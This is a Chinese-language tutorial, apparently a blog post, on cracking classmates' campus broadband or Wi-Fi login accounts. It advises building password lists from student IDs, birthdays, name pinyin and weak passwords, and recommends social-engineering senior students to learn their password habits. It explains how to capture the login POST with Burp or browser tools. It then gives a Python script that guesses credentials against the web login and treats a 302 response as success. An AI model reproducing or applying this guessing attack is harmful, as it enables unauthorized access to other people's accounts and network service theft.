校园宽带破解---解救断网之际(二)

需求：校园宽带破解的速度，以及正确率
分析：
1）先说速度：
第一个验证方式，我前一篇是采用cmd连接宽带，这个有个硬件限制，拨号不能太快和同时拨号，不然会显示解调器错误等，所以根据每个人电脑来，可以设置不同的延时，延时短是不是速度就上去了，但是这个不是最后的办法，前一篇我提到过，无线网页验证，这个不仅没有硬件的限制，同时可以多线程，高并发访问。
2)正确率
这个和你的密码本有关，这个你就要了解常用的密码，以及组合模式，大部分就是学号，生日，123456等弱密码，姓名全拼音，姓名拼音首字母和密码组合等，你可以通过社工方式去了解学长学姐们设置密码的方式，这个能提高不少正确率。
亮剑：

》第一步：找到无线登陆网址
》第二步：
观察界面，有几个输入框，有没有验证码，没有验证码，就简单些，有验证码，也不能说它难！
》第三步：分析post提交数据（因为有隐藏数据），以及提交后Http的状态码（为判断成功或者失败作准备）
我提供几种方案去分析：
1）用神器burp拦截，这里有几个要说明，burp拦截的数据已经urlencode了，所以后面如果要直接用，一定要处理一下，比如把%3A替换成：
2）用火狐F12或者火狐插件（HttpFox )
3）用chrome F12
》第四步：使用python requests 模拟登陆

wifiLogin_cracker.py

#coding=utf-8
import requests


def do_login(uname,upwd):
    # 无线登录网址
    url=""
    try:
        s=requests.session()
        #构造POST数据，通过工具分析的隐藏数据一定要添加，还有注意很长隐藏数据，很可能不一样，可以用比较工具分析
        pdata=dict()
        pdata['username']=uname
        pdata['possword']=upwd
        headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0',
                   'Content-Type': 'application/x-www-form-urlencoded',#这个必须要,就是为了进行url编码，不懂问度娘
                   }
        #提交POST
        resp=s.put(url,pdata,headers=headers)

        #判断是不是已经登录成功
        #这里根据分析直接用状态码就可以
        if resp.status_code==302:
            print 'uname: '+uname+' upwd: '+upwd+': login successs!'
    except Exception as e:
        print "分析下面报错："
        print e


if __name__=='__main__':
    do_login("2013121545",'123456')

》第五步：多线程，这个只要第四步走通，下面就很简单了，我就不写了